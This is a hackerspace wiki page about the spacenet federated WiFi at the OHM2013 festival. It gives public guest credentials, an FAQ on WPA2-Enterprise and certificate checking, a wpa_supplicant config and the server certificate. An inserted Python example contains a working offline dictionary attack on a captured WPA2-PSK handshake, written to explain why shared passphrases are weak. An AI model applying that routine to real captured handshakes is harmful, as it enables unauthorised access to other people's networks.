OHM2013

From SpaceFED

spacenet @ OHM2013

Spacenet is also being offered at OHM2013! You can connect with your credentials from your home hackerspace (or community). If you don't have an account you can connect with these credentials:

Username: guest@ohm2013.org
Password: guest

Phase 1: EAP-TTLS or PEAP
Phase 2: MSCHAPv2 or PAP
CN = *.ohm2013.org
CA = StartCom
SHA1 Fingerprint = BA:31:76:3C:D9:94:F7:D3:1B:E1:35:5C:E4:E1:72:34:74:02:59:C5


Join us at #spacefed on irc.smurfnet.ch if you have any questions. Enjoy! :)

P.S. Your link layer should be secure when using spacenet, provided you do certificate checking, but please note that spacenet in and of itself does not protect against ethernet/layer 2 attacks from other clients on the same network. Watch out for DHCP spoofing, ARP/NDP spoofing of the gateway and rogue router advertisements!

FAQ

Why is this useful?

Spacenet is federated authentication for WiFi networks. Spacenet is about providing easy and secure "guest" WiFi access for your fellow hackers. When you have an account at a hackerspace or community you can connect to spacenet. If you do not have an account you can connect to spacenet at OHM2013 with the guest credentials as noted above.

Spacenet is useful because:

  • Ease of use: configure once, use wherever available.
  • Security: uses WPA2 Enterprise, thus dynamic keys (unlike WPA2-PSK).

Is connecting to spacenet at OHM2013 with guest credentials more secure than connecting to the unencrypted (open) OHM2013 network?

Yes. Spacenet at OHM2013 runs on the same WiFi infrastructure and backend as the OHM2013 networks. Instead of completely unencrypted WiFi access, your data goes over the air encrypted by WPA2 Enterprise (CCMP/AES). Even though a lot of clients use the same credentials to log in to the network, this is not an issue:

The credentials you provide are used for authentication and authorization, *not* for encryption. During the 802.1X authentication a per-session master key (the PMK) is derived from the TLS exchange between your client and the RADIUS server; the server hands it to the access point over RADIUS and it is never sent over the air. The WPA2 4-way handshake then derives the actual session key from this PMK and fresh nonces, so every client ends up with its own keys even when all of them logged in with the guest account.

In WPA2-PSK (pre-shared key) networks the master key is derived from the passphrase that every user enters. Anyone who knows the passphrase and captures another client's 4-way handshake can derive that client's session key and decrypt its traffic, and the passphrase itself can be attacked offline from a captured handshake.
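The difference described above, worked through in code as an added example (not from the SpaceFED page): the PSK master key is derived from the passphrase, the 4-way handshake turns a master key into a per-session key, and the handshake MIC lets anyone who captured the handshake test passphrase guesses offline. The MAC addresses, nonces, EAPOL frame bytes, SSID and wordlist are constructed sample values; the enterprise master key is modelled as random bytes standing in for the key the TLS exchange produces.

```python
"""Why a shared WPA2-PSK passphrase is attackable while WPA2-Enterprise keys are not.

Added example, not from the SpaceFED page. MAC addresses, nonces, the EAPOL
frame bytes, the SSID and the candidate wordlist are constructed sample values.
"""
import hashlib
import hmac
import os


def psk_pmk(passphrase: str, ssid: str) -> bytes:
    # WPA2-PSK: PMK = PBKDF2-HMAC-SHA1(passphrase, ssid, 4096 iterations, 256 bits).
    # Every user of the network can compute this same key from the passphrase.
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def enterprise_pmk() -> bytes:
    # WPA2-Enterprise: the PMK is taken from the EAP MSK that the TLS-based method
    # (EAP-TTLS/PEAP) produces per authentication and that the RADIUS server hands to
    # the access point. Modelled here as fresh random bytes: no two sessions share it
    # and it is never sent over the air.
    return os.urandom(32)


def ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    # 4-way handshake, PRF-512 from IEEE 802.11i:
    #   PTK = PRF(PMK, "Pairwise key expansion",
    #             min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce))
    # PTK = KCK (16 bytes, MIC key) || KEK (16, key wrap) || TK (16, the CCMP traffic key).
    b = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    out = b"".join(
        hmac.new(pmk, b"Pairwise key expansion" + b"\x00" + b + bytes([i]), hashlib.sha1).digest()
        for i in range((512 + 159) // 160)
    )
    return out[:64]


def eapol_mic(kck: bytes, eapol_frame: bytes) -> bytes:
    # MIC over an EAPOL-Key frame (MIC field zeroed) for CCMP/AES, key descriptor
    # version 2: HMAC-SHA1 truncated to 128 bits. The MIC itself is sent in the clear.
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, aa, spa, anonce, snonce, eapol_frame, mic, wordlist):
    # Offline attack on a captured handshake: everything except the PMK is visible
    # on the air, so each candidate passphrase is tested by re-deriving the MIC.
    for candidate in wordlist:
        k = ptk(psk_pmk(candidate, ssid), aa, spa, anonce, snonce)
        if hmac.compare_digest(eapol_mic(k[:16], eapol_frame), mic):
            return candidate
    return None


def demo():
    # Constructed handshake parameters, as an eavesdropper would capture them.
    ssid = "spacenet-psk-demo"
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")
    anonce, snonce = bytes(range(32)), bytes(range(32, 64))
    eapol_msg2 = b"\x01\x03\x00\x75\x02\x01\x0a" + bytes(110)  # stand-in frame, MIC field zeroed
    wordlist = ["letmein", "hackerspace", "password", "ohm2013"]

    # WPA2-PSK: the legitimate station derives its PTK from the shared passphrase.
    station_ptk = ptk(psk_pmk("password", ssid), aa, spa, anonce, snonce)
    mic = eapol_mic(station_ptk[:16], eapol_msg2)
    recovered = crack_handshake(ssid, aa, spa, anonce, snonce, eapol_msg2, mic, wordlist)
    # Anyone who knows (or recovered) the passphrase now has this station's traffic key.
    intruder_tk = ptk(psk_pmk(recovered, ssid), aa, spa, anonce, snonce)[32:48] if recovered else None

    # WPA2-Enterprise: same visible handshake, but the PMK came out of this session's TLS
    # exchange. Neither other users' credentials nor a wordlist help the eavesdropper.
    ent_ptk = ptk(enterprise_pmk(), aa, spa, anonce, snonce)
    ent_mic = eapol_mic(ent_ptk[:16], eapol_msg2)
    ent_recovered = crack_handshake(ssid, aa, spa, anonce, snonce, eapol_msg2, ent_mic, wordlist)

    return {
        "psk_passphrase_recovered": recovered,
        "psk_traffic_key_exposed": intruder_tk == station_ptk[32:48],
        "enterprise_passphrase_recovered": ent_recovered,
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The `psk_pmk` function reproduces the IEEE 802.11i Annex H test vector (passphrase "password", SSID "IEEE"), so it can be checked against a real implementation; `crack_handshake` is the same computation aircrack-style tools perform, only with a four-word list.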

Why is checking the certificate important?

If your client does not check the certificate you cannot be sure you are actually connecting to the "correct" network. When your client is onboarded to a rogue network you are vulnerable to:

  • Man-in-the-middle attacks (you are not connecting to the "trusted" network)
  • Password sniffing (not really critical for guest credentials): with PAP your password travels in plaintext inside the TLS tunnel, so a rogue server at the other end of that tunnel reads it directly; with MSCHAPv2 the rogue server obtains a challenge/response from which your password can be recovered within a reasonable amount of time.
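A wpa_supplicant network block that applies the connection parameters listed at the top of this page (EAP-TTLS/PEAP, PAP/MSCHAPv2, CN *.ohm2013.org, StartCom CA) and enforces the certificate check this section asks for. This is an added example, not configuration shipped by the spacenet project or taken from the page; the SSID, the CA bundle path and the anonymous outer identity are assumptions and must be adjusted to your system.

```conf
# /etc/wpa_supplicant/wpa_supplicant.conf (excerpt) - added example, not from the page
network={
    ssid="spacenet"                     # assumed SSID
    key_mgmt=WPA-EAP                    # WPA2 Enterprise: per-session keys, not WPA-PSK
    pairwise=CCMP
    group=CCMP
    eap=TTLS                            # phase 1 (the page also allows eap=PEAP)
    phase2="auth=PAP"                   # phase 2 (the page also allows "auth=MSCHAPV2")
    identity="guest@ohm2013.org"        # or the account of your home hackerspace
    password="guest"
    # Assumed outer identity; keep the realm of your account so the federation can
    # route the request to the right RADIUS server without exposing your username.
    anonymous_identity="anonymous@ohm2013.org"

    # The certificate check. Without BOTH lines wpa_supplicant accepts any server
    # certificate, and a rogue AP with its own RADIUS server receives your password
    # (in plaintext with PAP, as a crackable challenge/response with MSCHAPv2).
    ca_cert="/etc/ssl/certs/ca-certificates.crt"   # assumed path; must contain the StartCom root
    domain_suffix_match="ohm2013.org"              # server cert must be for *.ohm2013.org / ohm2013.org
    # Older wpa_supplicant releases without domain_suffix_match can use the substring
    # match on the subject DN instead:
    # subject_match="CN=*.ohm2013.org"
}
```

`ca_cert` alone only proves the server holds some certificate from the StartCom CA; `domain_suffix_match` (or `subject_match`) is what ties it to the ohm2013.org name on the page. Compare the SHA1 fingerprint wpa_supplicant logs (`wpa_cli` / `wpa_supplicant -d`) with the one listed at the top of this page on first connection.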

Certificate

Please check the certificate!

Certificate:
    Data:
        Version: 3 (0x2)
        Serial Number: 66839 (0x10517)
        Signature Algorithm: sha1WithRSAEncryption
        Issuer: C=IL, O=StartCom Ltd., OU=Secure Digital Certificate Signing, CN=StartCom Class 2 Primary Intermediate Server CA
        Validity
            Not Before: Oct  8 07:50:42 2012 GMT
            Not After : Oct  9 23:22:54 2014 GMT
        Subject: description=nU7rvkhG3Xy0kwk6, C=NL, ST=Utrecht, L=Muiden, O=Int. Festivals for Creative Application of Technology Foundation, CN=*.ohm2013.org/emailAddress=hostmaster@ohm2013.org
        Subject Public Key Info:
            Public Key Algorithm: rsaEncryption
            RSA Public Key: (2048 bit)
                Modulus (2048 bit):
                    00:b6:55:a8:36:bb:77:2f:98:bd:bf:91:3e:75:07:
                    ea:5a:76:ca:25:fa:0f:a4:b3:53:59:04:73:a7:4c:
                    4b:c6:dc:45:3c:3b:35:23:ee:6a:f7:9a:ea:fe:b7:
                    be:67:29:3b:9b:53:1e:2d:ea:ee:dc:a2:58:db:ea:
                    20:f7:ab:73:66:0c:ad:fb:8f:2b:df:65:49:68:ed:
                    aa:a4:41:15:9e:6a:29:59:91:1b:25:cf:a6:bc:1b:
                    38:d7:8d:8b:18:12:87:62:b9:fd:47:21:22:c7:00:
                    17:d4:00:a0:65:77:9d:bd:6b:9e:78:2d:3e:9b:bc:
                    09:9f:4e:3c:8c:f8:4e:b3:64:96:18:70:3b:7a:ee:
                    02:55:8b:c5:bd:b5:a1:88:11:98:f6:71:28:01:12:
                    0c:ae:cd:00:05:3c:77:aa:e8:0e:a5:45:a8:6e:e7:
                    af:57:6e:ba:14:c6:07:b1:90:99:33:bd:d8:08:55:
                    dd:34:47:ce:c7:fc:1f:05:c3:e5:b6:20:49:95:04:
                    09:56:0c:6d:ac:4f:a5:98:5a:bc:c0:2c:7b:4b:5d:
                    31:97:b7:e7:91:12:28:92:e5:4e:54:9b:fe:7f:c6:
                    a6:3c:13:57:8f:1c:8b:4c:d2:f6:fb:56:24:d4:bf:
                    3e:8e:8e:45:dc:a3:fc:c7:22:df:ee:40:c5:52:79:
                    ec:4f
                Exponent: 65537 (0x10001)
        X509v3 extensions:
            X509v3 Basic Constraints: 
                CA:FALSE
            X509v3 Key Usage: 
                Digital Signature, Key Encipherment, Key Agreement
            X509v3 Extended Key Usage: 
                TLS Web Client Authentication, TLS Web Server Authentication
            X509v3 Subject Key Identifier: 
                18:A9:E4:DC:CD:FF:3C:DA:BE:0B:94:ED:1B:7C:C8:7D:3C:76:AF:FC
            X509v3 Authority Key Identifier: 
                keyid:11:DB:23:45:FD:54:CC:6A:71:6F:84:8A:03:D7:BE:F7:01:2F:26:86

            X509v3 Subject Alternative Name: 
                DNS:*.ohm2013.org, DNS:ifcat.org, DNS:*.ifcat.org, DNS:ohm2013.org
            X509v3 Certificate Policies: 
                Policy: 1.3.6.1.4.1.23223.1.2.2
                  CPS: http://www.startssl.com/policy.pdf
                  CPS: http://www.startssl.com/intermediate.pdf
                  User Notice:
                    Organization: StartCom Certification Authority
                    Number: 1
                    Explicit Text: This certificate was issued according to the Class 2 Validation requirements of the StartCom CA policy, reliance only for the intended purpose in compliance of the relying party obligations.
                  User Notice:
                    Organization: StartCom Certification Authority
                    Number: 2
                    Explicit Text: Liability and warranties are limited! See section "Legal and Limitations" of the StartCom CA policy.

            X509v3 CRL Distribution Points: 
                URI:http://crl.startssl.com/crt2-crl.crl

            Authority Information Access: 
                OCSP - URI:http://ocsp.startssl.com/sub/class2/server/ca
                CA Issuers - URI:http://aia.startssl.com/certs/sub.class2.server.ca.crt

            X509v3 Issuer Alternative Name: 
                URI:http://www.startssl.com/
    Signature Algorithm: sha1WithRSAEncryption
        7a:5d:01:5a:a7:6d:46:6b:d7:2a:5f:b5:0b:18:d9:56:da:c8:
        4d:c4:86:72:62:b6:1c:1a:c0:f2:9a:2b:a1:a7:d1:22:5f:68:
        6c:c5:b9:f6:57:9c:4c:86:37:1b:e9:47:c1:03:37:98:d3:7d:
        d2:da:be:9f:d6:1a:f2:5c:08:06:a7:2a:c2:eb:7b:58:1e:88:
        94:57:a1:4c:f4:7e:5d:fc:38:82:49:53:10:42:60:e7:12:7e:
        25:13:de:1b:4c:74:d9:9d:00:d6:f6:74:eb:4b:a4:81:d0:41:
        52:07:d6:64:e2:04:16:3a:97:93:70:6b:6d:9d:31:63:34:92:
        d1:b4:0c:4b:af:76:44:3e:08:95:08:14:e9:16:06:9e:8a:2a:
        1f:e4:22:01:dd:44:7c:53:7f:64:61:a2:e7:44:f8:76:b3:ec:
        20:1b:02:7e:5a:72:5e:49:1e:82:9b:60:12:b3:9d:c8:52:93:
        1a:30:4b:54:c0:07:9d:ea:41:89:30:d8:0f:99:2e:90:ac:95:
        26:b9:26:bc:cc:41:9e:e5:d1:23:1d:45:06:60:bc:fa:d2:05:
        28:7f:68:ee:14:b1:36:2b:5d:32:57:96:a6:b8:ff:31:5a:a9:
        f7:99:79:74:b0:f2:30:c7:9d:2b:f6:e8:89:55:24:98:8b:0f:
        c0:bb:72:e5
SHA1 Fingerprint=BA:31:76:3C:D9:94:F7:D3:1B:E1:35:5C:E4:E1:72:34:74:02:59:C5